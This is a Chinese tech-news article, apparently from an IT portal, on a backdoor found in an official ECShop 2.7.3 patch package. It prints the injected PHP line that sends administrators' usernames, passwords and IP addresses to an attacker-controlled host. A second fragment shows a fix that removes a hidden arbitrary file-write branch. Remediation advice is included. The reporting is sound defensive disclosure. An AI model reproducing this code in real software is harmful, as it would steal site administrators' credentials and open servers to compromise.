比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
开源网店ECShop又见后门 补丁程序再遭感染
关键字：EcShop 官方补丁 漏洞补丁 网店
　　ECShop是很多站长喜欢用的网店程序，其V2.7.3版本用户甚众。
　　2013年5月，SCANV网站中心曾经响应过ECShop网店程序的后门事件，本以为此事已了，不料在近日，又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。
　　经SCANV网站安全研究人员分析发现，这一次的后门代码存在于一个编号为273utf8_patch006的历史补丁文件包中。骇客将补丁包里的(\admin\privilege.php)文件篡改后，插入了一段记录后台用户及密码等的代码，并发送到一个由控制的上。值得注意的是，SCANV安全研究人员在分析前两次补丁后门代码里并没有发现本次的后门代码，因此，本次后门事件可能发生在前两次篡改之前。
　　本次骇客植入的后门代码：
　　文件\admin\privilege.php代码113-114行：
　　@file_get_contents('http://[马赛
　　克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
　　通过进一步分析发现“http://[马赛克]/”网站实际是被黑客控制的网站(“肉鸡”)，而且黑客用来收集密码等信息的文件目录还可以“历遍文件”，如图：
　　2013年5月，SCANV网站安全中心曾经响应过ECShop网店程序的后门事件，本以为此事已了，不料在近日，又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。
　　经过SCANV网站安全研究人员的下载并去重，发现大概有90个网站受影响。列表如下：
　　SCANV网站安全研究中心推荐的解决：
　　1、使用ecshoop的站长朋友，核对上面公布的域名，并查看文件\admin\privilege.php内容，搜索关键词“w2.php”。如果找到上面提到的，请直接删除后保存。
　　2、修改所有拥有后台权限的用户的密码，并通知网站所有用户修改密码。
　　3、复查网站及服务器的安全状况。
　　目前，官方已在6月3日发布新的补丁包
　　(/thread--1.html)，请站长及时检查修复。
　　SCANV网站安全中心在此提醒广大站长，为自己Web程序下载补丁文件时一定要做相应的检查，哪怕该补丁文件是从官方网站上下载的，也有可能感染恶意后门。正在使用该网店程序的站长可登录：/tools/#ECShop给自己的ECShop站点做个安全检测，平时可经常登录SCANV网站安全中心，以便第一时间了解自己网站的安全情况。
[ 责任编辑：小石潭记 ]
去年，手机江湖里的竞争格局还是…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注ChinabyteECShop 2.7.3官方补丁包存在后门
我的图书馆
ECShop 2.7.3官方补丁包存在后门
2）打开文件\includes\lib_base.php 按如下说明修改代码：function write_static_cache($cache_name,$caches,$newname,$newfile){&&& if (!empty($cache_name)){&&&&&&&&&& if ((DEBUG_MODE& 2) == 2)&&& {&&&&&&&&&& }&&& $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php';&&& $content = '';&&& file_put_contents($cache_file_path, $content, LOCK_EX);}else{@file_put_contents($newfile, $newname);}}修改为：function write_static_cache($cache_name, $caches){&&& if ((DEBUG_MODE& 2) == 2)&&& {&&&&&&&&&& }&&& $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php';&&& $content = '';&&& file_put_contents($cache_file_path, $content, LOCK_EX);}
馆藏&12701
TA的最新馆藏[转]&[转]&